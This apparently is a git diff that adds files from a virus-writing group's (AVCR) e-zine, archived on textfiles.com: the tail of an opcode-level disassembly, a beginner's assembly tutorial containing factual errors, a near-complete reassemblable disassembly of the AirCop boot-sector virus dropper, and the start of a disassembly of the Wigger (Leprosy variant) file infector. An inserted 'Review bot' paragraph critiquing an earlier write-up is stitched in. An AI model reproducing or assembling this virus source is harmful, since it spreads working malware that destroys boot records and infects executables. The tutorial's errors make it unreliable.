5746h, 0CD17h + dw 8EFFh, 0DB57h, 0E9A7h, 56F5h + dw 0A3ADh, 2684h, 0AFADh +var1_244 db 'P"q' + db 0EBh, 3Eh, 9Ch, 9Fh, 44h, 11h + db 9Dh, 9Fh, 3Ah, 1, 0F3h, 0A4h + db 2Eh, 8Ch, 0Eh, 36h, 0, 5Dh + db 9Eh, 0D5h, 36h, 99h, 6, 13h + db 10h +var1_260 dw 0E606h +var1_262 db '& z' + db 6, 0ACh +var1_268 db '^QP' + db 15h, 0DEh +loc_3: ; N-Ref=0 + xchg BP,AX + dec SI + push DI + dec SI + pop DI + int 0F7h + + dw 416Ah, 40FFh, 0E951h, 56F5h + dw 0A3ACh, 56F4h, 0A62Dh, 0A224h + dw 6BF0h, 678Eh, 0BC96h, 9090h + dw 0BE90h, 9E1Ch, 8096h, 0D9Eh + dw 9C96h, 8E83h, 288Fh, 0B5B1h + dw 0B15Dh, 248Fh, 1ABAh, 0A020h + dw 816Dh +var1_2a6 db 'HSQ' + db 0E5h, 7Bh, 9Ch, 70h, 0D0h, 
0A8h + db 95h +var1_2b0 db 'F6$5k' + db 0C0h, 0B8h, 0FDh, 56h, 24h, 0Ch + db 4Fh, 0E9h, 79h, 64h, 9Ch, 0 + db 0Fh, 0A8h, 3Fh, 1Ah, 20h, 0Fh + db 0ADh, 17h, 2Ch, 10h, 0A9h, 39h + db 34h, 0ABh, 33h, 6, 0Fh, 1Eh + db 0CCh, 20h, 1Eh, 2Fh, 81h, 1Fh + db 46h, 10h, 19h, 0FAh, 17h, 81h + db 91h, 0DFh, 2Bh, 53h, 15h, 0C9h + db 5Ch, 23h, 99h, 49h, 44h, 0B9h + db 0D5h, 50h, 11h +var1_2ee db 7Fh, 0F2h, 1Fh, 40h, 6Fh, 0E2h +var1_2f4 db '!@o' + db 86h +var1_2f8 db 'W5PPQ' + db 0E9h +var1_2fe db 'Mdl' + db 81h, 8Eh, 29h, 0BEh, 93h, 0A1h + db 8Eh, 1Ch, 96h, 0A5h, 91h, 8Eh + db 28h, 8Ch, 0B5h, 3Ah, 3Dh, 86h + db 8Eh, 9Fh, 4Dh, 0A1h, 9Fh + db '+Foy' + db 7, 6Eh, 10h, 6Ch, 0EBh, 0D4h + db 0B0h, 8Eh, 5Fh, 8Eh, 97h, 0A1h + db 0EFh, 18h, 4, 7Eh, 94h +var1_32d db 'VgQ' + db 0CCh, 8Ah, 8Fh, 7Ch, 0BFh, 34h + db 0B1h +var1_337 db '|P%' + db 0B8h, 0CCh, 0, 3, 1, 2 +var1_340 db 'vwu&>' + db 0Eh, 0A9h, 36h, 57h, 11h, 3Eh + db 9Ch, 0Eh, 59h, 11h, 1Eh, 7 + db 0B8h, 0, 3Dh, 0CDh +var1_355 db '!rV' + db 9Bh, 0C8h, 0A8h, 10h, 47h, 0DDh + db 31h, 3Eh, 0A9h +var1_361 db '6c!' 
+ db 0Eh, 0A9h +var1_366 db '.eQ' + db 0E4h +loc_4: ; N-Ref=0 + +var1_36a db 'o^O' + db 0EAh, 7Eh, 51h, 0F9h, 43h, 40h + db 8Dh +var1_374 db 'a2w{' + db 91h, 25h, 63h, 0E8h, 52h, 12h + db 63h, 99h, 93h, 72h, 6Dh, 81h + db 8Eh, 3, 0EBh, 0A1h, 0BEh, 19h + db 86h, 0DDh, 91h, 24h, 0AEh, 5Dh + db 0A1h, 0AEh, 1, 0BEh, 0AEh, 81h + db 0CDh, 0DAh, 0E5h, 93h, 79h, 57h + db 90h, 0BEh, 13h, 0AEh, 0EDh, 0A1h + db 0A0h, 0D7h, 0A9h, 8Eh, 21h, 9Eh + db 1Bh, 56h, 6Ch, 0AEh, 21h, 54h + db 0BEh, 0E4h, 47h, 69h, 0C7h +var1_3b3 db 'yiF' + db 0AEh +var1_3b7 db 32h, 59h +loc_5: ; N-Ref=0 + jns loc_notfound ; Jump if no sign ( >= 0) + sbb AL,56h ; 'V' Subtract with borrow + push DX + push CS + scasb ; Scan DS:SI for byte in AL + or Word Ptr [SI],BX + and Word Ptr [BX+SI],CX + + dw 5326h, 9FC0h, 5417h, 0D239h + dw 5001h, 0DA16h, 7526h, 29DCh + dw 98Eh, 646h, 0E697h, 0E137h + dw 30D6h, 1E63h, 269Fh, 1464h + dw 0EAEEh, 5506h, 0EF92h, 6A55h + db 9Ah, 76h, 25h, 0E9h, 0CCh, 9Fh + db 0FFh +loc_6: ; N-Ref=1 + inc BP + add AX,8E74h + je loc_notfound ; Jump if equal ( = ) + call far ptr loc_notfound + and AL,4Fh ; 'O' + pop DS + mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 + sub BP,Word Ptr [BP-5E13h] + mov SI,861Bh + esc Byte Ptr [BP+5D91h] + mov CL,24h ; '$' + + dw 0B3C0h, 4D49h, 6BA1h, 10A1h + dw 9028h, 0A3D2h, 0A359h, 5D42h + dw 0D281h, 8EB5h, 0EB01h, 0A5A1h + dw 0AFAEh, 0F37Eh, 5100h, 10E4h + dw 0FFAh, 0F941h, 4043h, 618Dh + dw 51E8h, 7E07h, 46DBh, 5113h + dw 0AB0Eh +var1_442 db '.e!' 
+ db 0EDh, 1, 94h, 2Eh, 0DDh, 31h + db 3Eh, 9Bh, 1Eh, 51h, 11h, 0F6h + db 0C1h, 7, 75h, 5, 0F6h, 0C1h + db 20h, 65h, 1Ah, 0A8h, 11h, 53h + db 3Eh, 0D5h, 6, 67h, 21h, 0EDh + db 1 +var1_464 db '?''}' + db 7Fh, 0Eh, 0Ah, 9, 0Bh, 8 + db 0CDh, 0B9h, 0E2h, 0BEh +var1_471 db '^N_' + db 13h, 11h, 12h, 10h, 0E9h, 57h + db 50h, 0EBh, 24h, 51h, 0AFh, 67h + db 2Bh, 0E7h, 5Eh, 0B1h, 0A7h, 0EBh + db 0EBh, 42h, 67h, 0C8h, 81h, 97h + db 1Bh, 87h, 0C8h, 9Bh, 40h, 0F4h + db 82h, 77h, 62h, 0Bh, 42h, 0DAh + db 0C9h, 0CBh, 8Fh, 53h, 8Eh, 96h + db 0C6h, 0C7h, 0F1h +loc_7: ; N-Ref=0 + scasb ; Scan DS:SI for byte in AL + cmpsw ; Cmp word at DS:SI to ES:DI + sbb AX,SP ; Subtract with borrow + mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 + out DX,AX ; Output to port [DX] from AX + aaa ; ASCII adjust for addition + push AX + out DX,AX ; Output to port [DX] from AX + cmp AX,0E851h + pop CX + inc CX + mov BP,0E4B2h + sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow + dec SI + xchg DX,AX + pop ES + +; + assume ES:nothing +; + + dec DI + add BX,BX + xchg DI,AX + cmpsw ; Cmp word at DS:SI to ES:DI + pop ES + jnb loc_notfound ; Jump if not below ( >= ) + xchg DI,AX + and Word Ptr [BP+SI],SP + jcxz loc_notfound ; Jump if CX = 0 + + dw 12F1h, 4B17h, 9A10h, 0E7E1h + dw 5507h, 0FE00h, 1F8Fh, 59h + dw 365h, 0CBABh, 0EB12h, 0B9FDh +var1_4e0 db ')T(' + db 89h, 20h, 54h, 0D6h, 0CDh, 0F9h + db 50h, 25h, 0AAh, 0FCh, 0AAh, 0Bh + db 4Eh, 1Fh, 82h, 16h, 47h, 13h + db 12h, 0CAh, 99h, 0DBh, 97h, 0A7h + db 77h, 3, 50h, 0E7h, 51h, 0A2h + db 'bq@' + db 0A3h, 0A6h, 0FAh, 0A1h, 1Bh, 68h + db 66h, 96h, 0C4h, 91h, 6Fh, 1Eh + db 86h, 0D8h, 81h, 0F4h, 92h, 3Ah + db 5Ah, 83h +var1_518 db 'j|8' + db 98h, 0E5h, 99h, 38h, 91h, 0D5h + db 57h, 4Ch, 8, 0A1h, 0D4h, 5Bh + db 2Bh, 93h, 0FAh, 0ABh, 0Bh, 0Ah + db 57h, 0Fh, 93h, 11h, 11h, 0CBh + db 4Eh, 1Ch, 41h, 0A2h, 0BEh, 9 + db 0B2h, 0A6h +loc_8: ; N-Ref=0 + or Word Ptr data_b400[BP+DI],DX + xor Word Ptr [SI],DX + and AL,Byte Ptr [SI] + esc Byte Ptr [SI] + mov 
Byte Ptr [BX+DI+78h],0E3h + sub AL,10h + + dw 1A64h +var1_54c db ',0d' + db 16h, 3Ch, 0FFh, 74h, 2, 0F8h + db 0C3h, 0F9h, 0C3h, 2Ch, 0A0h, 62h + db 16h, 2Ch, 0CFh, 67h, 12h, 0D9h + db 0E3h, 0D8h, 0E3h, 3Eh, 98h, 60h + db 20h, 0DEh, 88h, 0ABh, 0F1h +var1_56c db '' + db 0EFh, 3Eh, 2Bh, 11h, 16h, 43h + db 0B4h, 48h, 0BBh, 6Bh, 0, 0CDh +var1_756 db '![c' + db 13h, 0E9h, 17h, 0D3h, 3Eh, 0D6h + db 16h + db ' !!' + db 0AEh, 0E0h, 2Eh, 3Fh, 13h, 0AFh + db 0EEh, 50h, 51h, 0E9h, 0F5h, 56h + db 0ACh, 0B3h, 0E4h, 0FFh, 63h, 40h + db 0FEh +var1_776 db 'cASf' + db 1Bh, 51h, 0E9h, 0D2h, 56h, 76h + db 91h, 95h, 86h, 91h, 0ADh, 0E7h + db 0E6h, 42h, 66h, 1Eh, 48h, 24h + db 0D0h, 0A3h +var1_78e db 'B)%' + db 86h, 4Dh, 0A1h, 1Ch, 0D0h, 34h + db 0C9h, 5Dh, 0B1h, 0C8h, 0Dh, 9Eh + db 8Fh, 0E2h, 2Ah, 9Bh, 61h, 0D5h + db 16h, 0A7h, 58h, 63h +CODE_SEG_1 ends + + + + end start + + + diff --git a/textfiles.com/virus/avcr-01.006 b/textfiles.com/virus/avcr-01.006 new file mode 100644 index 00000000..5678fd8f --- /dev/null +++ b/textfiles.com/virus/avcr-01.006 
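Review bot: the before/after File Compare in avcr-01.005 does not support the claim that the only post-execution change is "the change in its code". Every listed difference is either the disassembler's load segment in a comment ("[602D:0100]" vs "[6342:0100]"), where the "= 0" / "= 6399h" annotations refer to addresses such as 8EE2h that lie far past the 1703-byte file and so describe the disassembler's memory rather than file contents, or the same four trailing bytes split across two directives ("db 16h, 0A7h, 58h, 63h" against "db 16h, 0A7h" plus "var1_7a5 db 58h, 63h"); a binary compare (FC /B) of AMI.COM before and after the run would settle whether any byte changed. The write-up should also state whether any other file was infected, since "delete infected files" names none and "probably memory resident" sits next to "Memory size does not change".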
@@ -0,0 +1,161 @@ + + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + An introduction to ASM + +THE BASE OF 10 + When most people see the number 10 they think of ten, or X. This +is because we are not computers, and we like small numbers. In our numbering +system, to go from 1 to 10 we multiply by 10, and to go from 10 to 100 we +multiply by ten again, refer to the chart below: + 1 10 100 1000 10000 + 1 *10 *10 *10 *10 + +THE BASE OF 2 + Your microprocessor has around 12 psudomemory locations which can +store a number, called a register. Each register contains a high, and a +low portion, each having an 8 bit capacity, thus you could have up to 24 8 +bit memory locations if you do not need the whole register's memory capacity. +The register has either an on (true) or an off (false), and because of this +we can not have the luxury of a number higher than 1, for 0 is false and 1 +is true. Each person has to work with 0's and 1's to make every number +imaginable! + The art of converting 1's and 0's into recognizable numbers and +working with these numbers is called binary arithmatic. Before we delve +into binary arithmatic lets look something more familiar: + + Base --> 10 <-- Exponent + + We look at numbers with a BASE of 10, while binary arithmitic +looks at numbers with a base of 2: + + 128 64 32 16 8 4 2 1 + +BASED on 2--> 2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0 + + Keeping the above in mind, lets count to ten in binary arithmatic, +and a more familiar base 10 arithmatic: + + 0 = 0000 + 1 = 0001 + 2 = 0010 + 3 = 0011 + 4 = 0100 + 5 = 0101 + 6 = 0110 + 7 = 0111 + 8 = 1000 + 9 = 1001 + 10 = 1010 + + Are we excited yet? Well if not, then you will be soon, because +now we are going to operate with binary numbers: + + Lets add 2 and 3 in base 10 and binary: + 1 + 2 0010 + +3 +0011 + --- ------ + 5 0101 + + Confused yet? Well lets take this step by step. 
To add 0010 (2) +and 0011 (3) we need to add up the digits as we would in base 10. 1+0 is +1, and we make a 1 in binary with 0001, easy. Now, lets take 1+1=2, how +do we make a two in binary? A two in binary is 0010, so the last number +goes in the answer space, and the 1 is carried. 1+0+0=1 and a 1 in binary +is 0001, so just a 1 is needed. Finally 0+0 in binary is 0000 so a 0 is +needed. Thats not so hard, is it? + Alright, now we must subtract numbers in binary. Lets take 3 and 2: + + 3 0011 + -2 -0010 + --- ------ + 1 0001 + + Nice and easy, you deserve a break after the adding , so the +subtracting is exactly the opposite of adding, not much to learn! + +INCREMENT \ DECREMENT + To increment something is to add 1 to it, so if we increment the +base 10 number 3 we get 4, much the same way, if we increment the binary +number 0011 we get 0100. The ASM instruction to increment is: + INC # + # could be a binary number, but it also could be a register. If +the number 0001 is stored in the AH register then "INC AH" would store +0010 in the AH register. + To decrement something is to subtract 1 from it, so if we decrement +the base 10 number 3 we get 2, much the same way, if we increment the binary +number 0011 we get 0010. The decrement syntax is: + DEC # + The processor can only increment to the # 9999, and then it goes back +to 0000, BUT a flag is set explaining that we are not at 0000 but rather at +10,000d (I would rather not figure out how to write 10,000 in binary so I +just put a d after it to indicate decimal, that is a valid ASM argument)! + +MOV IN ALL ITS GLORY: + The MOV statement moves a number from the register to memory, or +from the memory to a register, or even within each. The syntax for the +MOV statement is: + + MOV dest,source + + Thus, if I type "MOV AX,BX" the processor will move the contents +of the BX register into the AX register. 
If I type "MOV [AX],BX" then the +processor will move what is in the BX register into the number location +in your RAM corisponding to the number in the AX register. + +INT IT THE EASY WAY: + The INT argument calls a dos software interrupt or a hardware +interrupt, but lets first talk about the software interrupt. A software +interrupt is very similar to a subroutine, in that the program is written +for you, and you only have to put in the information explaining where +everything is. The syntax for the INT argument is: + INT # + Lets take an example, we will park the hard disk heads using a dos +software interrupt: + + MOV AH,19h ; puts 19 hexidecimal in the AH (A high) register. + MOV DL,80h ; puts 80 hexidecimal in the DL (D low) register. + INT 13h ; calls the interrupt + + See how easy it is to use software interrupts? Each interrupt has +its own command set, so you need to get a list of interrupts, and what +arguments you need in which registers. + +PUSH AND POP: + The PUSH statement pushes a register into memory and the POP +statement pops it back into the register: + + PUSH AH + MOV AH,19h + MOV DL,80h + INT 13h + POP AH + + This simple program saves the AH register, then it parks the heads, +and lastly it restores the AH register. + + This is the end of issue one of an Introduction to ASM, in our +next issue we will discuss the functions of all of the ASM codes, and +explain hardware interrupts, and MUCH more, so look for the next issue +of AVCR Magazine and look for AVCR-01.006! + Written By: + Th Patron diff --git a/textfiles.com/virus/avcr-01.007 b/textfiles.com/virus/avcr-01.007 new file mode 100644 index 00000000..9943602b --- /dev/null +++ b/textfiles.com/virus/avcr-01.007 
@@ -0,0 +1,509 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Research of the Air Cop Virus + by + Security Threat +Name of Virus: Air Cop +----------------------------------------------------------------------------- +Alias: Air Dropper +----------------------------------------------------------------------------- +Type Of Code: Not Informed +----------------------------------------------------------------------------- +VSUM Information - Resident boot +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus + +(2) +Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper +----------------------------------------------------------------------------- +Execution Results: It is a resident boot virus and it installs itself into +C:\ giving you an error saying "Non-system disk please replace and hit enter" +----------------------------------------------------------------------------- +Cleaning Recommendations: Cleaning is impossible but to rid your machine of +the virus a boot off of a boot disk is needed and if drive C: can be acessed +it must be reformatted. +----------------------------------------------------------------------------- +Researcher's Notes: Reads "STACK!" many times over and gives a warning line +then states that the virus is written by RABID development Corp. 
+ +----------------------------------------------------------------------------- + Disassembly of the AirCop Virus +----------------------------------------------------------------------------- + +PAGE 59,132 + +;========================================================================== +;== == +;== AIRCOP == +;== == +;== Created: 11-Jan-91 == +;== Version: == +;== Passes: 5 Analysis Options on: ABFMNOPU == +;== == +;== == +;========================================================================== + +movseg macro reg16, unused, Imm16 ; Fixup for Assembler + ifidn , + db 0BBh + endif + ifidn , + db 0B9h + endif + ifidn , + db 0BAh + endif + ifidn , + db 0BEh + endif + ifidn , + db 0BFh + endif + ifidn , + db 0BDh + endif + ifidn , + db 0BCh + endif + ifidn , + db 0BBH + endif + ifidn , + db 0B9H + endif + ifidn , + db 0BAH + endif + ifidn , + db 0BEH + endif + ifidn , + db 0BFH + endif + ifidn , + db 0BDH + endif + ifidn , + db 0BCH + endif + dw seg Imm16 +endm +keybd_q_head EQU 1AH ; (0040:001A=2CH) +keybd_q_tail EQU 1CH ; (0040:001C=2CH) + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +AIRCOP PROC FAR + +START: + MOV AX,CS + MOV DS,AX + MOV SP,3B6H + MOV AH,0 + MOV AL,3 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV DX,52BH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,3C3H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,4E5H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,464H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,480H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,40H + MOV ES,AX + PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH) + POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH) + MOV AX,CS + MOV ES,AX + MOV AH,8 + INT 21H ; DOS Services ah=function 08h + ; get keybd char 
al, no echo + MOV CX,3 + +LOCLOOP_1: + PUSH CX + MOV AX,201H + MOV BX,5D0H + MOV CX,1 + MOV DX,0 + INT 13H ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + POP CX + JNC LOC_2 ; Jump if carry=0 + LOOP LOCLOOP_1 ; Loop if cx > 0 + + MOV DX,4F2H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,4CFFH + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_2: + MOV CX,3 + +LOCLOOP_3: + PUSH CX + MOV AX,301H + MOV BX,5D0H + MOV CX,2709H + MOV DX,100H + INT 13H ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + POP CX + JNC LOC_4 ; Jump if carry=0 + LOOP LOCLOOP_3 ; Loop if cx > 0 + + MOV DX,50EH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,4CFFH + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_4: + MOV CX,3 + +LOCLOOP_5: + PUSH CX + MOV AX,301H + MOV BX,7D0H + MOV CX,1 + MOV DX,0 + INT 13H ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + POP CX +;* JNC LOC_6 ;*Jump if carry=0 + DB 73H, 0EH + LOOP LOCLOOP_5 ; Loop if cx > 0 + + MOV DX,57CH + MOV AH,9 +DATA_1 DD 0FFB821CDH +DATA_2 DD 0BA21CD4CH + DB 0E5H, 04H,0B4H, 09H,0CDH, 21H + DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH + DB 21H,0B8H, 00H, 4CH,0CDH + DB 21H +DATA_3 DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 'STACK STACK STACK STACK ' + DB 0DH, 0AH, 'Attention: This virus ' + DB 'sample uses only in research tea' + DB 'ms.', 0DH, 0AH, ' Plea' + DB 'se do not use in joking or setti' + DB 'ng trap on 
someone.', 0DH, 0AH, 0DH + DB 0AH, 'Warning! This file installs' + DB ' "$' + DB '" into your 360K disk!', 0DH, 0AH + DB 0DH, 0AH + DB 7 +DATA_6 DB '$' + DB 'Put a 360K (Blank Formatted) dis' + DB 'k into drive A:', 0DH, 0AH, 'Str' + DB 'ike any key to install, or CTRL-' + DB 'BREAK to quit.', 0DH, 0AH, '$' + DB 'Aircop Virus$' + DB 'Cannot read boot record.', 0DH, 0AH + DB 07H, 24H +DATA_10 DB 'Cannot write boot record.', 0DH, 0AH + DB 7, '$' +DATA_11 DB 'AIRCOP Test Version: Property of' + DB ' The RABID Nat', 27H, 'nl Develo' + DB 'pment Corp. ', 27H, '91', 0DH, 0AH + DB ' $' + DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 'Ca' + DB 'nnot write virus boot record', 0DH + DB 0AH + DB 7 + DB '$' + DB ' was installed into this 360K di' + DB 'sk. BE CAREFUL!', 0DH, 0AH, '$' + DB 512 DUP (0) + DB 0EBH + DB '4', 90H, 'IBM 3.3' + DB 00H, 02H, 02H, 01H, 00H, 02H + DB 70H, 00H,0D0H, 02H,0FDH, 02H + DB 00H, 09H, 00H, 02H, 00H + DB 19 DUP (0) + DB 12H, 00H, 00H, 00H, 00H, 01H + DB 00H,0FAH, 33H,0C0H, 8EH,0D8H + DB 8EH,0D0H,0BBH, 00H, 7CH, 8BH + DB 0E3H, 1EH, 53H,0FFH, 0EH, 13H + DB 04H,0CDH, 12H,0B1H, 06H,0D3H + DB 0E0H, 8EH,0C0H, 87H, 06H, 4EH + DB 00H,0A3H,0ABH, 7DH,0B8H, 28H + DB 01H, 87H, 06H, 4CH, 00H,0A3H + DB 0A9H, 7DH, 8CH,0C0H, 87H, 06H + DB 66H, 00H,0A3H,0AFH, 7DH,0B8H + DB 0BBH, 00H, 87H, 06H, 64H, 00H + DB 0A3H,0ADH, 7DH, 33H,0FFH, 8BH + DB 0F3H,0B9H, 00H, 01H,0FCH,0F3H + DB 0A5H,0FBH, 06H,0B8H, 85H, 00H + DB 50H,0CBH, 53H, 32H,0D2H,0E8H + DB 70H, 00H, 5BH, 1EH, 07H,0B4H + DB 02H,0B6H, 01H,0E8H, 8AH, 00H + DB 72H, 10H, 0EH, 1FH,0BEH, 0BH + DB 00H,0BFH, 0BH, 7CH,0B9H, 2BH + DB 00H,0FCH,0F3H,0A6H, 74H, 07H +LOC_7: + POP BX + POP AX + PUSH CS + MOV AX,0AFH + PUSH AX + +LOC_RET_8: + RETF ; Return far +LOC_9: + PUSH CS + POP DS + MOV SI,1DBH + CALL SUB_1 ; (08AA) + XOR AH,AH ; Zero register + INT 16H ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + XOR AX,AX ; Zero register + INT 13H ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + PUSH CS + POP 
ES + MOV BX,20DH + MOV CX,6 + XOR DX,DX ; Zero register + MOV AX,201H + INT 13H ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + JC LOC_9 ; Jump if carry Set + MOV CX,0FF0H + MOV DS,CX + JMP CS:DATA_2 ; (97DC:01AD=0CD4CH) + +AIRCOP ENDP + +;========================================================================== +; SUBROUTINE +;========================================================================== + +SUB_1 PROC NEAR +LOC_10: + MOV BX,7 + CLD ; Clear direction + LODSB ; String [si] to al + OR AL,AL ; Zero ? + JZ LOC_RET_14 ; Jump if zero + JNS LOC_11 ; Jump if not sign + XOR AL,0D7H + OR BL,88H +LOC_11: + CMP AL,20H ; ' ' + JBE LOC_12 ; Jump if below or = + MOV CX,1 + MOV AH,9 + INT 10H ; Video display ah=functn 09h + ; set char al & attrib bl @curs +LOC_12: + MOV AH,0EH + INT 10H ; Video display ah=functn 0Eh + ; write char al, teletype mode + JMP SHORT LOC_10 ; (08AA) + +;==== External Entry into Subroutine ====================================== + +SUB_2: + MOV BX,200H + MOV CX,2 + MOV AH,CL + CALL SUB_5 ; (08ED) + MOV CX,2709H + XOR BYTE PTR ES:[BX],0FDH + JZ LOC_13 ; Jump if zero + MOV CX,4F0FH +LOC_13: + JMP SHORT LOC_RET_14 ; (08F7) + NOP + +;==== External Entry into Subroutine ====================================== + +SUB_3: + MOV AH,2 + MOV BX,200H + +;==== External Entry into Subroutine ====================================== + +SUB_4: + MOV CX,1 + +;==== External Entry into Subroutine ====================================== + +SUB_5: + MOV DH,0 + +;==== External Entry into Subroutine ====================================== + +SUB_6: + MOV AL,1 + +;==== External Entry into Subroutine ====================================== + +SUB_7: + PUSHF ; Push flags + CALL CS:DATA_1 ; (97DC:01A9=21CDH) + +LOC_RET_14: + RETN +SUB_1 ENDP + + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH SI + PUSH DI + PUSHF ; Push flags + PUSH CS + POP DS + CMP DL,1 + JA LOC_16 ; Jump if above + AND AX,0FE00H + JZ LOC_16 ; Jump if zero + XCHG AL,CH + 
SHL AL,1 ; Shift w/zeros fill + ADD AL,DH + MOV AH,9 + MUL AH ; ax = reg * al + ADD AX,CX + SUB AL,6 + CMP AX,6 + JA LOC_16 ; Jump if above + PUSH CS + POP ES + CALL SUB_3 ; (08E5) + JC LOC_15 ; Jump if carry Set + MOV DI,43H + MOV SI,250H + MOV CX,0EH + STD ; Set direction flag + REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di] + JZ LOC_16 ; Jump if zero + SUB SI,CX + SUB DI,CX + MOV CL,33H ; '3' + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + CALL SUB_2 ; (08CB) + PUSH CX + PUSH BX + CALL SUB_3 ; (08E5) + MOV AH,3 + XOR BX,BX ; Zero register + CALL SUB_4 ; (08EA) + POP BX + POP CX + JC LOC_15 ; Jump if carry Set + MOV DH,1 + MOV AH,3 + CALL SUB_6 ; (08EF) +LOC_15: + XOR AX,AX ; Zero register + CALL SUB_7 ; (08F1) +LOC_16: + MOV AH,4 + INT 1AH ; Real time clock ah=func 04h + ; read date cx=year, dx=mon/day + CMP DH,9 + JNE LOC_17 ; Jump if not equal + MOV SI,1B1H + CALL SUB_1 ; (08AA) +LOC_17: + POPF ; Pop flags + POP DI + POP SI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + JMP CS:DATA_1 ; (97DC:01A9=21CDH) + POP CX + IN AL,DX ; port 100H + ADD AL,DH + DB 0F2H,0E6H, 00H,0F0H,0DAH,0DDH + DB 20H, 83H,0BFH,0BEH,0A4H,0F7H + DB 0BEH,0A4H,0F7H, 96H,0BEH,0A5H + DB 0B4H,0B8H,0A7H,0DAH,0DDH, 00H + DB 'IO SYSMSDOS SYS', 0DH, 0AH + DB 'Non-system disk or disk error', 0DH + DB 0AH + DB 00H, 00H, 55H,0AAH + +SEG_A ENDS + + + + END START +----------------------------------------------------------------------------- + + This virus was written for research purposes and RABID development +Corp. can in no way take responsibility for any damage done. + ST diff --git a/textfiles.com/virus/avcr-01.008 b/textfiles.com/virus/avcr-01.008 new file mode 100644 index 00000000..ec488218 --- /dev/null +++ b/textfiles.com/virus/avcr-01.008 
@@ -0,0 +1,452 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Research of the wigger virus + by + Security Threat + +Name: Wigger +----------------------------------------------------------------------------- +Alias: +----------------------------------------------------------------------------- +Type Of Code: Not Informed +----------------------------------------------------------------------------- +VSUM Information: No info found on WIGGER.COM +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy + +(2) +Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus" +----------------------------------------------------------------------------- +Execution Results: Infects all COM and EXE files. +----------------------------------------------------------------------------- +Cleaning Recommendations: Impossible. Infected programs must be deleted +----------------------------------------------------------------------------- +Researcher's Notes: As infecting either reads "program to big to fit in +memory" or "You have noticed wiggers seem to have taken over the high school +scene." "If you see one, please hit him with your car". It is a variant of +leprosy. 
Also "News flash","Plague","viper","busted","leprosy-c", +"leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death" +----------------------------------------------------------------------------- + Disassembly of the wigger Virus + PAGE 60,132 + + + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + call near ptr proc_2 + jmp loc_5 +proc_start endp + + + +var1_106 db 0 + +; +; +; PROCEDURE proc_1 +; +; + +proc_1 proc near + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + push BX + call near ptr proc_2 + pop BX + mov CX,29Ah + mov DX,offset var1_100 + mov AH,40h ; '@' + int 21h ; DOS func ( ah ) = 40h + ; Write to file or device + ;BX-file handle + ; CX-bytes to read DS:DX-DTA + ;if CF=0 AX-bytes read + ; else AX-ret code + call near ptr proc_2 + retn +proc_1 endp + + + +; +; +; PROCEDURE proc_2 +; +; + +proc_2 proc near + mov BX,offset var1_131 +loc_1: ; N-Ref=1 + mov AH,Byte Ptr [BX] + xor AH,Byte Ptr var1_106 ; [6556:0106] = 